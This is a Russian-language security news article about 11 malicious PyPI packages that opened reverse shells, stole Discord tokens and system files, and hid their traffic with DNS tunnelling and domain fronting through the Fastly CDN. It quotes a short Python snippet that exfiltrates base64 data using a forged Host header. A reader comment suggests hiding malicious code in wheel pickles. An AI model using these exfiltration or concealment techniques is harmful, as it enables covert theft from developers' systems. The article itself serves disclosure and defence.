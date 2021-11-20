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В каталоге PyPI выявлены вредоносные библиотеки, использующие CDN PyPI для скрытия канала связи

20.11.2021 09:52

В каталоге PyPI (Python Package Index) выявлено 11 пакетов, включающих вредоносный код. До выявления проблем в сумме пакеты успели загрузить около 38 тысяч раз. Выявленные вредоносные пакеты примечательны применением замысловатых способов скрытия каналов связи с серверами злоумышленников.

  • importantpackage (6305 загрузок), important-package (12897) - устанавливали соединение с внешним сервером под видом подключения к pypi.python.org для предоставления shell-доступа к системе (reverse shell) и использовали для скрытия канала связи программу trevorc2.
  • pptest (10001), ipboards (946) - использовали DNS в качестве канала связи для передачи сведений о системе (в первом пакете имя хоста, рабочий каталог, внутренний и внешний IP, в во втором - имя пользователя и хоста).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - выявляли в системе токен сервиса Discord и отправляли на внешний хост.
  • trrfab (287) - отправлял на внешний хост идентификатор, имя хоста и содержимое /etc/passwd, /etc/hosts, /home.
  • 10Cent10 (490) - устанавливал обратное shell-соединение с внешним хостом.
  • yandex-yt (4183) - выводил сообщение о компрометации системы и перенаправлял на страницу с дополнительной информацией о дальнейших действиях, выдаваемой через nda.ya.ru (api.ya.cc).

Отдельного внимания заслуживает метод обращения к внешним хостам, используемый в пакетах importantpackage и important-package, которые использовали для скрытия своей активности сеть доставки контента Fastly, применяемую в каталоге PyPI. Фактически запросы отправлялись на сервер pypi.python.org (в том числе, указывая имя python.org в SNI внутри запроса HTTPS), но при этом в HTTP-заголовок "Host" выставлялось имя сервера, подконтрольного атакующим (sec.forward.io.global.prod.fastly.net). Сеть доставки контента направляла подобный запрос на сервер атакующих, используя при передаче данных параметры TLS-соединения с pypi.python.org.

Работа инфраструктуры PyPI обеспечивается с привлечением сети доставки контента Fastly, в которой для кэширования типовых запросов используется прозрачный прокси Varnish, а также применяется обработка TLS-сертификатов на уровне CDN, а не конечных серверов, для организации проброса HTTPS-запросов через прокси. Независимо от целевого хоста запросы направляются в прокси, который определяет нужный хост по HTTP-заголовку "Host", а доменные имена хостов привязываются к типовым для всех клиентов Fastly IP-адресам балансировщиков нагрузки CDN.

Сервер атакующих также регистрируется в CDN Fastly, который предоставляет всем желающим бесплатные тарифные планы и даже допускает анонимную регистрацию. Примечательно, что для отправки запросов жертве при создании "reverse shell" используется также схема, но инициируемая со стороны хоста злоумышленников. Со стороны взаимодействие с сервером атакующих выглядит как легитимный сеанс с каталогом PyPI, шифруемый с использованием TLS-сертификата PyPI. Подобная техника, известная под именем "domain fronting", ранее активно использовалась для скрытия имени хоста при обходе блокировок, используя предоставляемую в некоторых CDN-сетях возможность обращения по HTTPS с указанием в SNI фиктивного хоста и фактической передачей имени запрашиваемого хоста в HTTP-заголовке Host внутри TLS-сеанса.

Для скрытия вредоносной активности дополнительно применялся пакет TrevorC2, позволяющий сделать взаимодействие с сервером похожим на обычную web-навигацию, например, вредоносные запросы отправлялись под видом загрузки изображения "https://pypi.python.org/images/guid=" с кодированием информации в параметре guid. 


   url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
   r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

В пакетах pptest и ipboards применялся другой подход для скрытия сетевой активности, основанный на кодировании полезной информации в запросах к DNS-серверу. Вредоносное ПО передаёт информацию, выполняя DNS-запросы вида "nu4timjagq4fimbuhe.example.com", в которых при помощи формата base64 в имени поддомена закодированы передаваемые на управляющий сервер данные. Злоумышленник принимает данные сообщения, контролируя DNS-сервер для домена example.com.

  1. Главная ссылка к новости (https://jfrog.com/blog/python-...)
  2. OpenNews: RangeAmp - серия атак на CDN, манипулирующая HTTP-заголовком Range
  3. OpenNews: 46% Python-пакетов в репозитории PyPI содержат потенциально небезопасный код
  4. OpenNews: Уязвимость в cdnjs, позволившая выполнить код на серверах Cloudflare
  5. OpenNews: Атака CPDoS, позволяющая сделать недоступными страницы, отдаваемые через CDN
  6. OpenNews: Применение тайпсквоттинга для распространения вредоносных модулей NPM, PyPI и Gems
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/56190-pypi
Ключевые слова: pypi, python, malware, pypi, cdn
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Обсуждение (5) RSS
  • 1.1, 918 (?), 10:04, 20/11/2021 [ответить]  
    		• +/
    > Сервер атакующих также регистрируется в CDN Fastly, который предоставляет всем желающим бесплатные тарифные планы и даже допускает анонимную регистрацию.

    с ребятами в масках Гая Фокса шутки плохи

     
  • 1.3, Аноним (3), 10:13, 20/11/2021 [ответить]  
    		• +/
    >Фактически запросы отправлялись на сервер pypi.python.org, но при этом в HTTP-заголовок "Host" выставлялось имя сервера, подконтрольного атакующим (sec.forward.io.global.prod.fastly.net).

    Неужели телеграм ещё не поработал над созданием предлога для их запрета в РФ?

     
  • 1.4, Аноним (3), 10:26, 20/11/2021 [ответить]  
    		• +/
    Есть ещё один способ скрытия. Изготавливается пакет. С сорцами на гитхабе. Легитимно выглядящий. В сорцах нет ничего лишнего. Только pickle используется "для ускорения", pickles строятся во время сборки пакета. Pull requestы, выпиливающие pickle, закрываются с мотивацией "я тут автор, и я решаю, что в моём пакете будет".

    А дальше если в пакет на pypi в встроенные в wheel pickles внести вредоносный код, никто и не обнаружит. Мало того, что почти никто не смотрит пакеты на pypi, так ещё pickles - это бинарник, для анализа которого инструментария нормального нет. Соответственно статические анализаторы, которые почти все заточены под исключительно исходник, его пропустят.

     
  • 1.5, Аноним (5), 10:37, 20/11/2021 [ответить]  
    		• +1 +/
    в каталоге вредоносных библиотек выявлены - библиотеки.

     
  • 1.6, Аноним (3), 10:41, 20/11/2021 [ответить]  
    		• +/
    >yandex-yt (4183) - выводил сообщение о компрометации системы и перенаправлял на страницу с дополнительной информацией о дальнейших действиях, выдаваемой через nda.ya.ru (api.ya.cc).

    Похоже, что кто-то получил награду в bug bounty.

     

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